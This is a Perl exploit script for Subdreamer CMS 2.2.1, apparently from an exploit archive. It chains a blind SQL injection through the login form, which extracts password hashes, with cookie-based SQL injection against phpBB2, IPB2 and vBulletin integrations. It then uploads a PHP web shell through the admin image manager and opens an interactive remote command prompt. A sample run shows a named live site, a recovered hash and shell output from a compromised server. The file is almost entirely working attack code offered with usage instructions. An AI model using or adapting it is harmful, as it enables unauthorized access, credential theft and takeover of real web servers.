==========================================================Subdreamer 2.2.1 SQL

1. ==========================================================
2. Subdreamer 2.2.1 SQL Injection / Command Execution Exploit
3. ==========================================================
4.  
5.  
6.  
7.  
8.  
9. #!/usr/bin/perl
10.  
11. ## Subdreamer 2.2.1 command exec exploit
12. ## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
13. ## supported targets:
14. ## ~ without forum integration
15. ## ~ with phpBB2 integration
16. ## ~ with ipb2 integration
17. ## ~ with vbulletin2 integration
18. ## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
19. ## (c)oded by 1dt.w0lf - 19/09/2005
20. ## RST/GHC
21. ## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
22.  
23. ## work:
24. ## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
25. ## r57subdreamer.pl -p http://subdreamer.com.ru/ -u 2 -t 1
26. ## ------------------------------------------------------------------
27. ## [~] PATH : http://subdreamer.com.ru/
28. ## [~] USER : 2
29. ## [~] TARGET : 1 - PhpBB2
30. ## [1] STEP 1 : TRY GET USER PASSWORD
31. ## [~] SEARCHING PASSWORD ... [ DONE ]
32. ## -----------------------------------------------------------
33. ## USER_ID: 2
34. ## PASS: 26310e438a5a1fb8622738f1e5d34f8b
35. ## -----------------------------------------------------------
36. ## [2] STEP 2 : CHECK WHAT USER HAVE ACCESS TO ADMIN ZONE
37. ## [+] DONE! THIS USER HAVE ACCESS!
38. ## [3] STEP 3 : UPLOAD FILE
39. ## [+] DONE! FILE "img.php" UPLOADED
40. ## [+] WELL DONE! NOW YOU CAN EXECUTE COMMANDS! =)
41. ## SUBDREAMER# id; uname -a; ls -la;
42. ## ----------------------------------------------------------------
43. ## uid=1003(apache) gid=1003(apache) groups=1003(apache)
44. ## FreeBSD customer-3314.cit-network.net 5.3-RELEASE FreeBSD 5.3-RELEASE #0:
45. ## Fri Nov 5 04:19:18 UTC 2004 root@harlow.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
46. ## total 24
47. ## drwxrwxrwx 5 enshteyn apache 512 Sep 19 23:04 .
48. ## drwxr-x--- 10 enshteyn apache 512 Sep 17 21:03 ..
49. ## drwxr-xr-x 2 enshteyn apache 512 Sep 10 14:09 Image
50. ## -rw-r--r-- 1 apache apache 48 Sep 19 23:04 img.php
51. ## drwxrwxrwx 2 enshteyn apache 512 Sep 10 14:09 logos
52. ## drwxrwxrwx 2 enshteyn apache 512 Sep 10 14:09 smilies
53. ## ----------------------------------------------------------------
54. ## SUBDREAMER# exit
55. ## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
56.  
57. ## config
58. ## ------
59. ##
60. ## images folder
61. $img_folder = 'images';
62. ## or try
63. ##$img_folder = 'images/logos';
64. ##
65. ## end config
66.  
67. use LWP::UserAgent;
68. use HTTP::Cookies;
69. use Getopt::Std;
70.  
71. getopts('u:p:h:t:');
72.  
73. $path = $opt_p;
74. $user = $opt_u;
75. $hash = $opt_h;
76. $target = $opt_t || 0;
77.  
78. $s_num = 1;
79. $|++;
80. $n = 0;
81.  
82. @targets = (
83. #['target name','colimn1 in database','colimn2 in database','cookie name 1','cookie name 2']
84. ['Subdreamer without forum','userid','password','sduserid','sdpassword'],
85. ['PhpBB2','user_id','user_password','phpbb2mysql_data',''],
86. ['IPB2','id','member_login_key','member_id','pass_hash'],
87. ['PhpBB2 cookie injection','','','phpbb2mysql_data',''],
88. ['IPB2 cookie injection','id','','member_id','pass_hash'],
89. ['Vbulletin cookie injection','userid','','bbuserid','bbpassword'],
90. );
91.  
92. if (!$path || !$user || $target<0 || $target>5) { &usage; }
93. &head();
94. if($path=~/[^\/]$/) { $path .= '/'; }
95. print "[~] PATH : $path\r\n";
96. print "[~] USER : $user\r\n";
97. print "[~] TARGET : $target - $targets[$target][0]\r\n";
98. if($target==1||$target==2||$target==0) {
99. print "[1] STEP 1 : TRY GET USER PASSWORD\r\n";
100. if(!$hash){
101. print "[~] SEARCHING PASSWORD ... [|]";
102.  
103. FIND: while(1)
104. {
105. if(&found(47,58)==0) { &found(96,103); }
106. $char = $i;
107. if ($char=="0")
108. {
109. if(length($allchar) > 0){
110. print qq{\b\b DONE ]
111. -----------------------------------------------------------
112. USER_ID: $user
113. PASS: $allchar
114. -----------------------------------------------------------
115. };
116. last FIND;
117. }
118. else
119. {
120. print "\b\b FAILED ]";
121. }
122. exit();
123. }
124. else
125. {
126. $allchar .= chr($char);
127. }
128. $s_num++;
129. }
130. }
131. else
132. {
133. print "[~] SKIP. HASH EXISTS\r\n";
134. $allchar = $hash;
135. }
136. }
137.  
138. print "[2] STEP 2 : CHECK WHAT USER HAVE ACCESS TO ADMIN ZONE\r\n";
139. if(&check_admin_rights())
140. {
141. print "[+] DONE! THIS USER HAVE ACCESS!\r\n";
142. }
143. else
144. {
145. print "[-] DAMN! THIS USER NOT ADMIN =(\r\n";
146. exit();
147. }
148.  
149. print "[3] STEP 3 : UPLOAD FILE\r\n";
150. if(&upload_file())
151. {
152. print "[+] DONE! FILE \"img.php\" UPLOADED\r\n";
153. }
154. else
155. {
156. print "[-] DAMN! UPLOAD ERROR =(\r\n";
157. exit();
158. }
159. print "[+] WELL DONE! NOW YOU CAN EXECUTE COMMANDS! =)\r\n";
160.  
161. while ()
162. {
163. print "SUBDREAMER# ";
164. while(<STDIN>)
165. {
166. $cmd=$_;
167. chomp($cmd);
168. exit() if ($cmd eq 'exit');
169. last;
170. }
171. &run($cmd);
172. }
173.  
174. sub found($$)
175. {
176. my $fmin = $_[0];
177. my $fmax = $_[1];
178. if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
179.  
180. $r = int($fmax - ($fmax-$fmin)/2);
181. $check = " BETWEEN $r AND $fmax";
182. if ( &check($check) ) { &found($r,$fmax); }
183. else { &found($fmin,$r); }
184. }
185.  
186. sub crack($$)
187. {
188. my $cmin = $_[0];
189. my $cmax = $_[1];
190. $i = $cmin;
191. while ($i<$cmax)
192. {
193. $crcheck = "=$i";
194. if ( &check($crcheck) ) { return $i; }
195. $i++;
196. }
197. $i = 0;
198. return $i;
199. }
200.  
201. sub check($)
202. {
203. $n++;
204. status();
205. $ccheck = $_[0];
206. $username = "no_such_user' OR (".$targets[$target][1]."=".$user." AND (ascii(substring(".$targets[$target][2].",".$s_num.",1))".$ccheck.")) /*";
207.  
208. $xpl = LWP::UserAgent->new() or die;
209. $res = $xpl->post($path.'index.php',
210. {
211. "loginusername" => $username,
212. "loginpassword" => "nap0Jlb_Haxep",
213. "login" => "login",
214. "Submit now" => "Login"
215. }
216. );
217. @results = $res->content;
218.  
219. foreach $result(@results)
220. {
221. if ($result =~ /(Database error)|(Invalid SQL)/i)
222. {
223. print "\r\n[-] SQL SYNTAX ERROR! CHECK TARGET!\r\n";
224. exit();
225. }
226. #print $result;
227. # english pattern
228. if ($result =~ /Wrong Password/) { return 1; }
229. # russian pattern
230. if ($result =~ /...... ......./) { return 1; }
231. # russian pattern 2
232. if ($result =~ /............ ....../) { return 1; }
233. # russian pattern 3 ( KOI8-R tested on subdreamer.com.ru )
234. if ($result =~ /...... ......./) { return 1; }
235. }
236. return 0;
237. }
238.  
239. sub status()
240. {
241. $status = $n % 5;
242. if($status==0){ print "\b\b/]"; }
243. if($status==1){ print "\b\b-]"; }
244. if($status==2){ print "\b\b\\]"; }
245. if($status==3){ print "\b\b|]"; }
246. }
247.  
248. sub check_admin_rights()
249. {
250. $xpl = LWP::UserAgent->new() or die;
251. $cookie_jar = HTTP::Cookies->new( );
252. $xpl->cookie_jar( $cookie_jar );
253. ($host = $path) =~ s!http://([^/]*).*!$1!;
254.  
255. if($target == 1)
256. {
257. # not default phpbb2 cookie, work for subdreamer.com.ru ... maybe default for subdreamer pro RU ???
258. #$cookie_jar->set_cookie( "0",$targets[$target][3], 'autologinid='.$allchar.'|userid='.$user,"/",$host,,,,,);
259. # default phpbb2 cookie
260. $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22".$allchar."%22%3Bs%3A6%3A%22userid%22%3Bs%3A".length($user)."%3A%22".$user."%22%3B%7D","/",$host,,,,,);
261. }
262. elsif($target == 3)
263. {
264. # phpbb2 cookie with sql injection
265. $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A3%3A%22666%22%3Bs%3A6%3A%22userid%22%3Bs%3A".(length($user)+4)."%3A%22".$user."%27+%2F%2A%22%3B%7D","/",$host,,,,,);
266. }
267. elsif($target == 4)
268. {
269. # ipb2 cookie with sql injection
270. $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,);
271. $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,);
272. }
273. elsif($target == 5)
274. {
275. # Vbulletin cookie with sql injection
276. $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,);
277. $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,);
278. }
279. else
280. {
281. # subdreamer || ipb2 cookies
282. $cookie_jar->set_cookie( "0",$targets[$target][3], $user,"/",$host,,,,,);
283. $cookie_jar->set_cookie( "1",$targets[$target][4], $allchar,"/",$host,,,,,);
284. }
285.  
286. $res = $xpl->get($path."admin/index.php");
287. if($res->content =~ /loginpassword/) { return 0; }
288. else { return 1; }
289. }
290.  
291. sub upload_file()
292. {
293. $xpl = LWP::UserAgent->new() or die;
294. $cookie_jar = HTTP::Cookies->new( );
295. $xpl->cookie_jar( $cookie_jar );
296. ($host = $path) =~ s!http://([^/]*).*!$1!;
297.  
298. if($target == 1)
299. {
300. # not default phpbb2 cookie, work for subdreamer.com.ru ... maybe default for subdreamer pro RU ???
301. #$cookie_jar->set_cookie( "0",$targets[$target][3], 'autologinid='.$allchar.'|userid='.$user,"/",$host,,,,,);
302. # default phpbb2 cookie
303. $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22".$allchar."%22%3Bs%3A6%3A%22userid%22%3Bs%3A".length($user)."%3A%22".$user."%22%3B%7D","/",$host,,,,,);
304. }
305. elsif($target == 3)
306. {
307. # phpbb2 cookie with sql injection
308. $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A3%3A%22666%22%3Bs%3A6%3A%22userid%22%3Bs%3A".(length($user)+4)."%3A%22".$user."%27+%2F%2A%22%3B%7D","/",$host,,,,,);
309. }
310. elsif($target == 4)
311. {
312. # ipb2 cookie with sql injection
313. $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,);
314. $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,);
315. }
316. elsif($target == 5)
317. {
318. # Vbulletin cookie with sql injection
319. $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,);
320. $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,);
321. }
322. else
323. {
324. # subdreamer || ipb2 cookies
325. $cookie_jar->set_cookie( "0",$targets[$target][3], $user,"/",$host,,,,,);
326. $cookie_jar->set_cookie( "1",$targets[$target][4], $allchar,"/",$host,,,,,);
327. }
328.  
329. $res = $xpl->post($path.'admin/imagemanager.php',Content_Type => 'form-data',
330. Content => [
331. 'action' => 'uploadimage',
332. 'folderpath' => "../$img_folder/",
333. 'MAX_FILE_SIZE' => '1000000',
334. 'image' => [
335. undef,
336. 'img.php',
337. Content_type => 'text/plain',
338. Content => '<? if($_POST[cmd]) { passthru($_POST[cmd]); } ?>',
339. ],
340. 'submit' => 'Upload Image',
341. ],
342. );
343. if($res->content =~ /Settings Updated/) { return 1; }
344. if($res->content =~ /Uploading Errors/) { return 0; }
345. else { return 1; }
346. }
347.  
348. sub run()
349. {
350. $xpl = LWP::UserAgent->new() or die;
351. $res = $xpl->post($path.$img_folder.'/img.php',{'cmd'=>$cmd});
352. print "----------------------------------------------------------------\r\n";
353. print $res->content;
354. print "----------------------------------------------------------------\r\n";
355. }
356.  
357. sub usage()
358. {
359. &head();
360. print q(| |
361. | - Usage: |
362. | r57subdreamer.pl -p <path> -u <user_id> [-t <target>] [-h <hash>] |
363. | <path> - Path to subdreamer folder |
364. | <user_id> - User id for bruteforce |
365. | <hash> - MD5 password hash for this user if you have it =\) |
366. | - Available targets: |
367. | - brute password: |
368. | 0 - Subdreamer without forum integration ( default ) |
369. | 1 - Subdreamer with PhpBB2 integration |
370. | 2 - Subdreamer with IPB2 integration |
371. | - cookie sql injection, dont need brute password: |
372. | 3 - Subdreamer with PhpBB2 integration 2 |
373. | 4 - Subdreamer with IPB2 integration 2 |
374. | 5 - Subdreamer with Vbulletin integration |
375. +--------------------------------------------------------------------+
376. | e.g.: |
377. | r57subdreamer.pl -p http://127.0.0.1/subdreamer/ -u 1 |
378. | r57subdreamer.pl -p http://www.subdreamer.com.ru -u 2 -t 1 |
379. +--------------------------------------------------------------------+
380. );
381. exit();
382. }
383.  
384. sub head()
385. {
386. print q(
387. +--------------------------------------------------------------------+
388. | Subdreamer version 2.2.1 sql injection + command execution exploit |
389. | by 1dt.w0lf |
390. | RST/GHC |
391. +--------------------------------------------------------------------+
392. );}
393.  
394.  
395.  
396. # 0day.today [2016-04-19] #